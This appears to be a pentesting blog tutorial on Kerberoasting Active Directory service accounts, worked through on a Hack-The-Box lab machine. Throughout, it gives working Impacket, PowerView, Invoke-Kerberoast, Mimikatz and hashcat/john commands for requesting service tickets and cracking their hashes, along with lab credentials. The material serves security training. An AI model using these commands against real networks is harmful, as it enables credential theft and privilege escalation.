R3d Buck3T
Published in

R3d Buck3T

ACTIVE DIRECTORY — KERBEROS ATTACKS — PRIVILEGE ESCALATION

Attacking Service Accounts with Kerberoasting

Forge Service Tickets (TGS) with Kerberoasting MITRE ATT&CK ID: T1558.003, Active HTB machine

https://unsplash.com/photos/6HR8vpjYUHo — Yanapi Senaud

Today, we will discuss an old and well-known attack against Kerberos authentication during an Active Directory pentesting assessment called Kerberoasting. We will go over the attack overview, prerequisites, and the steps needed to conduct the attack. The demonstration steps will be on the Pentester Academy Active Directory Lab by Nikhil Mittal associated with the CRTP course and the Active machine on Hack-The-Box.

📝KEY CONCEPTS

  • Kerberoasting Overview
  • Service Principal Name Role
  • Attack Pre-requisites
  • Tools
  • Demonstration Steps

$_Kerberoasting_Overview

The general concept of Kerberoasting is requesting service tickets (TGS) from the KDC (Kerberos Domain Controller) that are associated with service accounts to retrieve their hashes. Then, attempt to crack them offline with tools like Hashcat or John to recover the cleartext passwords to either escalate privileges vertically to become a local administrator or horizontally to access a set of different resources that can be used for pivoting within the network.

The service accounts can be linked to hosts like computers (CN=Computers) or domain users (CN=Users). Each service account can be mapped to a set of running services like MSSQL, Web, SharePoint, File shares, Exchange services, etc., within the domain known as Service Principal Names (SPNs).

📍Service Principal Name maps the host/user service accounts to running services.

Service Principal Names (SPNs)

The structure of an SPN consists of three (3) main parts: Service Class: the service type, i.e., SQL, Web, Exchange, File, etc., and the Host where the service is usually running in the format of FQDN (Fully Qualified Domain Name)and port number. For example, below, the Microsoft SQL service runs on the dcorp-mgmt host on port 1443.

The SPN is MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433

Figure 1 — shows the SPN structure
Figure 1 — shows the SPN structure
Figure 2 — shows the list of SPNs mapped to service and computer accounts
Figure 2 — shows the list of SPNs mapped to service and computer accounts

Since TGS tickets are encrypted with the service accounts, NTLM hashes by design, requesting a valid service account from the KDC is legitimate. However, the insecurity lies in the strength of the encrypted hash, which allows for brute-forcing attacks.

Kerberoasting works best against user service accounts configured with weak passwords, not the host-based computer accounts that use random 128 character passwords that are changed every 30 days.

🎯 The attack’s goal is to retrieve the cleartext passwords of service accounts to either escalate our privileges since most service accounts run with admin-related privileges or pivot laterally within the network.

🚩$_Attack_Pre-requisites

  • Credentials of a valid domain user service account (not a computer account).
  • Service Principal Names of the services tied to the service user account.
  • Service ticket (TGS) for the running service.

🔧$_Used_Tools:

  • PowerView
  • Invoke-Kerberoast
  • Invoke-Mimikatz
  • Impacket
  • Hashcat
  • John

$_Attack_Steps

Since this is an assumed breach scenario, we have already obtained the credentials for the initial foothold for the service account user svc_tgs. Our goal is to escalate our privileges to an administrator by cracking the svc_tgs service ticket hash.

We first need to identify all the running services mapped to the service account and their privileges through the SPN attribute.

◼️Identify Service Principal Names

To identify the SPNs, we can use either the Impacket — GetUserSPN script or the PowerView from PowerSploit.

Run the Impacket GetUserSPN script with the domain name, service account username (svc_tgs), and password. As we see in the screenshot below, it returns one running service; the CIFS file sharing service associated with the svc_tgs account with Administrator privileges.

python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 
Figure 3 — shows getting SPN information tied to the service account svc_tgs with impacket
Figure 3 — shows getting SPN information tied to the service account svc_tgs with impacket

We can achieve the same results on windows with PowerView with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname

If the group id returns in the 500s, the account has admin privileges.

◼️Request Service Tickets

The next step would be requesting a service ticket (TGS) for the service account. In Impacket, we can use the GetUserSPN script again with the flag request.

python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

As we see, the ticket KDC returns a valid TGS ticket to access the CIFS service as an administrator.

📌HackTricks Tip: If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronize the host with the DC: ntpdate <IP of DC>

Figure 4 — shows getting the service ticket from the KDC
Figure 4 — shows getting the service ticket from the KDC

We can also accomplish the same thing with PowerShell with Add-Type cmdlet. We can specify which service we want to request a ticket for with the ArgumentList flag.

Add-Type -AssemblyName System.IdentityModelNew -ObjectSystem.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Service class\Hostname:Port"

◼️ Export the Service Ticket

After acquiring the service ticket hash, save the ticket in a file to brute-force it offline with tools like John or Hashcat. We can do that in multiple ways:

In Impacket, we can export the ticket by adding the -outputfile flag for output with the GetUserSPNs script.

python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -outputfile tgs_hashes.txt
Figure 5 — shows saving the TGS ticket in an output file
Figure 5 — shows saving the TGS ticket in an output file

We can also use the Invoke-Kerberoast script from PowerSploit. Download the script, import it locally with Import-Module cmdlet, and run the script specifying the domain name and output format. In the below case, I chose the Hashcat format.

Import-Module .\invoke-kerberoast.ps1Invoke-Kerberoast -Domain active.htb -OutputFormat Hashcat | fl

For the Invoke-Mimikatz (PowerShell) script, use the /export to save all the available Kerberos tickets locally on the desk.

Import-Module .\Invoke-Mimikatz.ps1Invoke-Mimikatz -Command '"kerberos::list /export"'
Figure 6- shows exporting Kerberos tickets with Invoke-Mimikatz PS script
Figure 6— shows exporting Kerberos tickets with Invoke-Mimikatz PS script

Then copy the ticket file to the desired location with the Copy-Item cmdlet.

Copy-Item TicketFile.kirbi C:\Path
Figure 7 — shows copying the exported kirbi files to Downloads directory
Figure 7 — shows copying the exported kirbi files to Downloads directory

If you choose to export the tickets with Mimikatz, you need to convert the kirbi file to a format John or Hashcat would process. For John, use kirbi2john.py and Hashcat kirbi2Hashcat scripts.

◼️ Crack the Hashes Offline

Now that we have the hashes formatted correctly for the cracking tools, we start the cracking process.

With Hashcat

hashcat -m 13100 --force <TGSs_file> <passwords_file>
Figure 8 — shows Hashcat retrieves the cleartext password for svc_tgs
Figure 8 - shows Hashcat retrieves the cleartext password for svc_tgs

and with John

john --format=krb5tgs --wordlist=<passwords_file> <ticket_file>

With that, we finished our post for today; we learned about the Kerberoasting attack and leveraged it to obtain the service account svc_tgs that is running with administrator’s permissions, and used the cracking tools (Hashcat/John) to get the cleartext password (Ticketmaster1968).

That’s all for today, and thanks a lot for stopping by 😃.

🔔 All of the used commands can be found at R3d-Buck3T — (Active Directory — Privilege Escalation — Kerberoasting Service Tickets)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nairuz Abulhul

Nairuz Abulhul

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester >>Security Researcher